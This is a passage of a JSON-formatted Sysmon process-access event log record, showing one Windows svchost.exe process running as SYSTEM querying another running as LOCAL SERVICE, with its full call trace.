"Message": "Process accessed:\r\nRuleName: -\r\nUtcTime: 2022-08-04 15:36:15.091\r\nSourceProcessGUID: {625b42a0-6b35-62e9-1200-000000000900}\r\nSourceProcessId: 888\r\nSourceThreadId: 3696\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {625b42a0-4111-62e9-4600-000000000900}\r\nTargetProcessId: 2696\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9c524|C:\\Windows\\System32\\KERNELBASE.dll+6a685|c:\\windows\\system32\\lsm.dll+106fe|C:\\Windows\\System32\\RPCRT4.dll+76963|C:\\Windows\\System32\\RPCRT4.dll+da036|C:\\Windows\\System32\\RPCRT4.dll+37a5c|C:\\Windows\\System32\\RPCRT4.dll+548d8|C:\\Windows\\System32\\RPCRT4.dll+2c931|C:\\Windows\\System32\\RPCRT4.dll+2c1eb|C:\\Windows\\System32\\RPCRT4.dll+1a86f|C:\\Windows\\System32\\RPCRT4.dll+19d1a|C:\\Windows\\System32\\RPCRT4.dll+19301|C:\\Windows\\System32\\RPCRT4.dll+18d6e|C:\\Windows\\System32\\RPCRT4.dll+169a5|C:\\Windows\\SYSTEM32\\ntdll.dll+333fd|C:\\Windows\\SYSTEM32\\ntdll.dll+34152|C:\\Windows\\System32\\KERNEL32.DLL+17944|C:\\Windows\\SYSTEM32\\ntdll.dll+6ce71\r\nSourceUser: NT AUTHORITY\\SYSTEM\r\nTargetUser: NT AUTHORITY\\LOCAL SERVICE",
"Task": "10",
"RuleName": "-",
"UtcTime": "2022-08-04 15:36:15.091",
"SourceProcessGUID": "{625b42a0-6b35-62e9-1200-000000000900}",
"SourceProcessId": "888",
"SourceThreadId": "3696",
"SourceImage": "C:\\Windows\\system32\\svchost.exe",
"TargetProcessGUID": "{625b42a0-4111-62e9-4600-000000000900}",
"TargetProcessId": "2696",
"TargetImage": "C:\\Windows\\System32\\svchost.exe",
"GrantedAccess": "0x1000",
"CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9c524|C:\\Windows\\System32\\KERNELBASE.dll+6a685|c:\\windows\\system32\\lsm.dll+106fe|C:\\Windows\\System32\\RPCRT4.dll+76963|C:\\Windows\\System32\\RPCRT4.dll+da036|C:\\Windows\\System32\\RPCRT4.dll+37a5c|C:\\Windows\\System32\\RPCRT4.dll+548d8|C:\\Windows\\System32\\RPCRT4.dll+2c931|C:\\Windows\\System32\\RPCRT4.dll+2c1eb|C:\\Windows\\System32\\RPCRT4.dll+1a86f|C:\\Windows\\System32\\RPCRT4.dll+19d1a|C:\\Windows\\System32\\RPCRT4.dll+19301|C:\\Windows\\System32\\RPCRT4.dll+18d6e|C:\\Windows\\System32\\RPCRT4.dll+169a5|C:\\Windows\\SYSTEM32\\ntdll.dll+333fd|C:\\Windows\\SYSTEM32\\ntdll.dll+34152|C:\\Windows\\System32\\KERNEL32.DLL+17944|C:\\Windows\\SYSTEM32\\ntdll.dll+6ce71",
"SourceUser": "NT AUTHORITY\\SYSTEM",
"TargetUser": "NT AUTHORITY\\LOCAL SERVICE"
}